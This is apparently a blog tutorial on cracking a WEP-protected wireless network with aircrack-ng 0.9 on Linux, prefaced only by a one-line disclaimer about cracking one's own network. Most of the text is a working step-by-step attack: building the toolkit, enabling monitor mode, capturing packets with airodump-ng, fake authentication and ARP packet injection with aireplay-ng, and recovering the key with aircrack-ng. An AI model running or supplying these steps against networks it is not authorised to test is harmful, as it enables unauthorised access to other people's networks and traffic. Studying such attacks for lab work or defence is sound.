Disclaimer: Notice that you are only allowed to crack your personal network, please don’t use this information for other purposes.

If you are using a Broadcom 43xx based wireless card, Dell 1390, for example, install the module compiled by me (that’s for the 2.6.20-15-generic kernel, for the 2.6.20-16-generic one compile it yourself or wait until I’ll provide one get it here) . If you are using another wireless network card, search for instructions about patching your driver here.

Now that we have to proper driver, let’s install aircrack-ng 0.9. You may use another version, but this one includes the PTW attack, witch is faster and requires less packages. You’ll need to install some dev packages (actually, I think sudo apt-get install build-essential should do).

cd ~
wget http://download.aircrack-ng.org/aircrack-ng-0.9.tar.gz
tar -xzf ./aircrack-ng-0.9.tar.gz
cd aircrack-ng-0.9
make
sudo make install

If you got no error, aircrack-ng is installed. Now we activate the monitoring mode by running sudo airmon-ng start eth1.

Then you start airodump-ng by running sudo airodump-ng eth1 so that you can note the channel, the ESSID and the BSSID. ifconfig eth1 and note you MAC address.

Now we create a folder where to save the *.cap files and start airodump-ng.

mkdir ./dumps
cd ./dumps
airodump-ng -c channel - -bssid BSSID -w dump eth1

Now we do fake authentification (run the following command in another terminal, because we don’t want to stop airodump).

aireplay-ng -1 0 -e ESSID -a BSSID -h YOUR_MAC eth1

Next we start packet injection (in the same terminal as the fake authentification).

aireplay-ng -3 -b BSSID -h YOUR_MAC eth1

Now wait until you have something like 50.000 IVS (displayed in the #Data column). Then stop airodump-ng (CTRL+C). Run aircrack-ng -z dump*.cap. If it finds the key in a few seconds, we are done. If not, stop aircrack-ng (CTRL+C) and start airodump-ng again using the same command.